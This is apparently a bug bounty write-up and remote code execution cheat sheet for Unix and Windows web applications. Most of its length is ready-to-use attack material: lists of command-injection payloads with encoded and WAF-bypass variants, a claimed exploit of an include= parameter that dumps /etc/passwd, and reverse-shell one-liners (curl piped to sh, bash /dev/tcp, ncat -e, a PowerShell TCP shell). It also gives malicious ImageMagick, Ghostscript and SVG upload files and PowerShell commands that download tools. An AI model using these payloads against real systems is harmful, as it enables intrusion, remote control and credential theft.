Remote Code Execution ( Unix and Windows )

Remote Code Execution ( Unix and Windows )

Hi everyone,

This is Ansar Uddin and I am a Cyber Security Researcher from Bangladesh.

This is my second Bug bounty write-up.

Today’s topic is all about Rce exploitation.

RCE : Remote Code Execution (RCE) enables the attacker to execute malicious code as a result of an injection attack. Code Injection attacks are different than Command Injection attacks. Attacker capabilities depend on the limits of the server-side interpreter.In some cases, an attacker may be able to escalate from Code Injection to Command Injection.A Remote Code Evaluation can lead to a full compromise of the vulnerable web application and also web server. It is important to note that almost every programming language has code evaluation functions.

HUNT for RCE:

Top 46 RCE Parameters :

exec={payload}
command={payload}
execute{payload}
ping={payload}
include={payload}
exclude={payload}
jump={payload}
code={payload}
reg={payload}
do={payload}
func={payload}
arg={payload}
option={payload}
load={payload}
process={payload}
step={payload}
read={payload}
function={payload}
req={payload}
feature={payload}
exe={payload}
module={payload}
payload={payload}
run={payload}
print={payload}
email={payload}
id={payload}
username={payload}
user={payload}
to={payload}
from={payload}
search={payload}
query={payload}
q={payload}
s={payload}
shopId={payload}
blogId={payload}
phone={payload}
mode={payload}
next={payload}
firstname={payload}
lastname={payload}
locale={payload}
cmd={payload}
sys={payload}
system={payload}

Payload list:

,id
;id
`id`
|id
&id
&&id
;uname -a;
|id|
||id
||id|
|id;
||id;
;|id|
\id;
\id
\id|
\id\
);id
);id;
;id;
);id|
;id|
)|id
)|id;
' `id` #
| id
& id
; id
& id &
&id&
& uname -a &

Rce when all dangerous characters are escaped:

%7Cid
%26id
%0a uname -a %0a
%27%0Awhoami%0A%27
%27%0Aid%0A%27
%7cid;pwd;uname -a
%7C%7Cid%0A
%2Cid
%3Bid
%3Buname%20-a%3B
%7Cid%7C
%7C%7Cid%7C
%7Cid%3B
%7C%7Cid%3B
%3B%7Cid%7C
%5Cid%3B
%5Cid
%5Cid%7C
%5Cid%5C
%29%3Bid
%29%3Bid%3B
%3Bid%3B
%29%3Bid%7C
%3Bid%7C
%29%7Cid
%29%7Cid%3B
%26%26dir
%26%26id
%7C%20id
%26%20id
%3B%20id
%26%20id%20%26
%60id%60
%26id%26
%26%20uname%20-a%20%26
%26 id %26
%0aid%0a
%0Aid
%0Aid%0A
%0a whoami %0a
%0Acat%20/etc/passwd
%253B%2524%257B%2540print%2528md5%2528%2522whoami0%2522%2529%2529%257D%253B
%7Cuname%20-a%2B%7C%7Ca%2B%23%27%2B%7Cls%2B-la%7Ca%2B%23%7C%22%2B%7Cls%2B-la%7C%7Ca%2B%23
%22%2Csystem%28%27ls%27%29%3B%22
%24%7B%40system%28%22id%22%29%7D
%24%7B%40phpinfo%28%29%7D
%3Bphpinfo%28%29%3B
%3Bphpinfo
%3Bsystem%28%27cat%2520%2Fetc%2Fpasswd%27%29
%3Bsystem%28%27id%27%29
%24%28id%29
%3B%24%7B%40print%28md5%28whoami%29%29%7D
%3B%24%7B%40print%28md5%28%22whoami%22%29%29%7D
%24%3Bid
%24%28%60cat%20%2Fetc%2Fpasswd%60%29

RCE filter and WAF Bypass:

'
whoami
'|uname -a+||a+#'+|ls+-la|a+#|"+|ls+-la||a+# rce waf bypass
",system('ls');" double quote rce filter bypass
${@system("id")} eval code bypass
${@phpinfo()}
;phpinfo();
;phpinfo
;system('cat%20/etc/passwd')
;system('id')
$(id)
;${@print(md5(whoami))}
;${@print(md5("whoami"))}
$;id
$(`cat /etc/passwd`)
{{ get_user_file("/etc/passwd") }}
<!--#exec cmd="id;-->
system('cat /etc/passwd');
<?php system("cat /etc/passwd");?>
php -r 'var_dump(exec("id"));'
&lt;!--#exec%20cmd=&quot;id;--&gt;cat$u+/etc$u/passwd$u
/bin$u/bash$u <ip> <port>
";cat+/etc/passwd+#
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
;+cat+/e'tc/pass'wd
c\\a\\t+/et\\c/pas\\swd
cat /etc$u/passwd
(sy.(st).em)(whoami);
;cat+/etc/passwd
;cat+/etc/passwd+#
;cat$u+/etc$u/passwd$uid||whoami;
id|whoami;
id&&whoami;
id&whoami;'i'd
"i"d
\u\n\a\m\e \-\a
cat$u /etc$u/passwd$u
w${u}h${u}o${u}a${u}m${u}ii$(u)d
i`u`d{uname,-a}
cat${IFS}/etc/passwd
cat$IFS/etc/passwd‘i’d“i”d\u\n\a\m\e \-\aw${u}h${u}o${u}a${u}m${u}iIFS=];b=cat]/etc/passwd;$b
IFS=,;`cat<<<cat,/etc/passwd`
uname${IFS}-a
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
cat `xxd -r -p <<< 2f6574632f706173737764`
cat `xxd -r -ps <(echo 2f6574632f706173737764)`1;uname${IFS}-a
1;uname${IFS}-a;#
1;uname${IFS}-a;#${IFS}'
1;uname${IFS}-a;#${IFS}';/*$(id)`id`
/*$(id)`id``*/-id-'/*$(id)`id` #*/-id||'"||id||"/*`*/
/*$(id)`id``*/id'/*$(id)`id` #*/id||'"||id||"/*`*/IFS=,;`cat<<<cat,/etc/passwd`/*$(id)`id`/*$(id)`id``*/id’/*$(id)`id` #*/id||’”||id||”/*`*/

Reverse shell :

nc -l 1337curl https://reverse-shell.sh/yourip:1337 | shReverse Shell Generator:
https://www.revshells.com

I found Rce on top organization

Exploitation:

I checked the include= parameter. It is vulnerable to rce

‘
whoami && id && uname -a && cat /etc/passwd
‘

There was a waf that was blocking my request

I used this payload for exploitation:

'
whoami && id && uname -a && cat /etc/passwd
'

I converted this payload to url encode:

Our Final payload for Waf bypass:

%27%0a%77%68%6f%61%6d%69%20%26%26%20%69%64%20%26%26%20%75%6e%61%6d%65%20%2d%61%20%26%26%20%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%0a%27Boom Rce!

It will bypass the escape of special characters.

Find rce Bugs on Upload function:

nc -l -p 1337

Save as test.gif or test.jpg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL3lvdXJpcC95b3VycG9ydCAwPiYx | base64 -d | bash`"||id " )'
pop graphic-contextpush graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/yourip/yourport 0<&1 2>&1'
pop graphic-context
pop graphic-context%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%ncat yourip yourport -e /bin/sh) currentdevice putdeviceprops%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') currentdevice putdeviceprops

Save as poc.xml:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
"http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg&quot;|/bin/nc.traditional yourip yourport -e /bin/bash&quot;"
x="0" y="0" height="640px" width="480px"/>
</svg>

nc -nvlp 1337

Save as test.gif or test.jpg

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') currentdevice putdeviceprops%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') (w) file%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/yourip/yourport 0>&1') currentdevice putdeviceprops%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl http://inputburpcollaborator) currentdevice putdeviceprops

Save as poc.pdf

%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl http://inputburpcollaborator)
.putdeviceparams
quitThis one is best for finding Rce bugs on the upload function:

https://github.com/modzero/mod0BurpUploadScanner.git

This tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. It can be seen as the equivalent of frohoff’s ysoserial, but for PHP. Currently, the tool supports gadget chains such as: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework

This one is best for finding rce bugs (framework/library):

https://github.com/ambionics/phpggc

Payload list:

".system('dir')."
' dir
' || dir
' & dir
' && dir
'; dir
" dir
" || dir
" | dir
" & dir
" && dir
"; dir
dir
$(`dir`)
&&dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir
; dir
& dir
&& dir| ipconfig /all
; ipconfig /all
& ipconfig /all
&& ipconfig /all
ipconfig /all|| phpinfo()
| phpinfo()
{${phpinfo()}}
;phpinfo()
;phpinfo();//
';phpinfo();//
{${phpinfo()}}
& phpinfo()
&& phpinfo()
phpinfo()
phpinfo();

Rce when all dangerous characters are escaped:

%27%20dir
%27%20%7C%7C%20dir
%27%20%26%20dir
%27%20%26%26%20dir
%27%3B%20dir
%22%20dir
%22%20%7C%7C%20dir
%22%20%7C%20dir
%22%20%26%20dir
%22%20%26%26%20dir
%22%3B%20dir
%22.system%28%27dir%27%29.%22
%24%28%60dir%60%29
%26%26dir
%7C%20dir%20C%3A%5C
%3B%20dir%20C%3A%5C
%26%20dir%20C%3A%5C
%26%26%20dir%20C%3A%5C
dir%20C%3A%5C
%7C%20dir
%3B%20dir
%26%20dir
%26%26%20dir
+dir+c:\+|
+|+dir+c:\+|
+|+dir+c:%2f+|
dir+c:\
||+dir|c:\
+|+Dir+c:\
+|+Dir+c:%255c
+|+Dir+c:%2f
$+|+Dir+c:\
$+|+Dir+c:%255c
$+|+Dir+c:%2f
%26%26+|+dir c:\
%0a+dir+c:\
%26%26+|+dir c:%2f
$%26%26dir+c:%2f
%0a+dir+c:%2f
%0a+dir+c:%255c
$%26%26dir c:\
%26%26+|+dir c:%255c
$%26%26dir+c:%255c
%20{${phpinfo()}}

Reverse shell:

nc -nvlp 443

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('your ip',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =
$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.T
ext.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII
).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c
lient.Close()"orpowershell -NoP -NonI -W Hidden -Exec Bypass "& {$ps=$false;$hostip='your ip';$port=443;$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream();[byte[]]$bytes = 0..50000|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$cmd=(get-childitem Env:ComSpec).value;$inArray=$data.split();$item=$inArray[0];if(($item -eq '$ps') -and ($ps -eq $false)){$ps=$true}if($item -like '?:'){$item='d:'}$myArray=@('cd','exit','d:','pwd','ls','ps','rm','cp','mv','cat');$do=$false;foreach ($i in $myArray){if($item -eq $i){$do=$true}}if($do -or $ps){$sendback=( iex $data 2>&1 |Out-String)}else{$data2='/c '+$data;$sendback = ( &$cmd $data2 2>&1 | Out-String)};if($ps){$prompt='PS ' + (pwd).Path}else{$prompt=(pwd).Path}$sendback2 = $data + $sendback + $prompt + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"

Reverse Shell Generator:
https://www.revshells.com

Download files:

powershell -c "(new-object System.Net.WebClient).DownloadFile('https://eternallybored.org/misc/wget/1.21.1/64/wget.exe','C:\Users\admin\Desktop\wget.exe')"powershell iwr -uri http://10.10.16.97:8000/chisel.exe -outfile ch.exe # also works in PS ConstrainLanguageModeBest burpsuite extension for Rce (Unix and windows):

https://github.com/ewilded/shelling

Best command injection exploiter:

https://github.com/commixproject/commix

Happy Hacking!